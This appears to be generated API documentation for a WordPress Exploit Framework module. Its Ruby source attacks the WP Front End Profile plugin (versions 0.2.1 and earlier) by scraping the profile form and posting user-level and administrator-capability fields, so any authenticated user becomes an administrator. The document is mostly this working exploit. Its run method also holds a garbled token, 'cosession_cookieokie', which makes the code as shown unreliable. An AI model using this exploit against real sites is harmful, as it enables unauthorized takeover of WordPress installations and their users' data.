class Wpxf::Auxiliary::WpFrontEndProfilePrivilegeEscalation

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::Module::new
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 6
def initialize
  super

  update_info(
    name: 'WP Front End Profile <= 0.2.1 Privilege Escalation',
    desc: %(
      The WP Front End Profile plugin, in versions <= 0.2.1, allows authenticated
      users of any user level to escalate their user role to an administrator.
    ),
    author: [
      'rastating' # WPXF module
    ],
    references: [
      ['WPVDB', '8620']
    ],
    date: 'Sep 15 2016'
  )

  register_options([
    StringOption.new(
      name: 'profile_form_path',
      desc: 'The path to the page containing the profile editor form',
      required: true
    )
  ])
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 33
def check
  check_plugin_version_from_readme('wp-front-end', '0.2.2')
end
fetch_profile_form() click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 45
def fetch_profile_form
  res = nil

  scoped_option_change('follow_http_redirection', true) do
    res = execute_get_request(url: profile_form_url, cookie: session_cookie)
  end

  res
end
form_fields_with_default_values() click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 55
def form_fields_with_default_values
  res = fetch_profile_form
  return nil unless res && res.code == 200

  fields = {}
  res.body.scan(/<input.+?name="(.+?)".+?value="(.*?)".*?>/i) do |match|
    if match[0].start_with?('wpfep_nonce_name', '_wp_http_referer', 'profile[')
      emit_info "Found field #{match[0]}", true
      fields[match[0]] = match[1]
    end
  end

  fields
end
profile_form_url() click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 41
def profile_form_url
  normalize_uri(full_uri, datastore['profile_form_path'])
end
requires_authentication() click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 37
def requires_authentication
  true
end
run() click to toggle source
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 70
def run
  return false unless super

  emit_info 'Requesting profile editor form...'
  form_fields = form_fields_with_default_values

  if form_fields.nil?
    emit_error 'Failed to retrieve the profile form'
    return false
  end

  form_fields['profile[wp_user_level]'] = 10
  form_fields['profile[wp_capabilities][administrator]'] = 1
  form_fields['profile[wpfep_save]'] = 'Update Profile'

  emit_info 'Elevating privileges...'
  execute_post_request(
    url: profile_form_url,
    cookie: cosession_cookieokie,
    body: form_fields
  )
end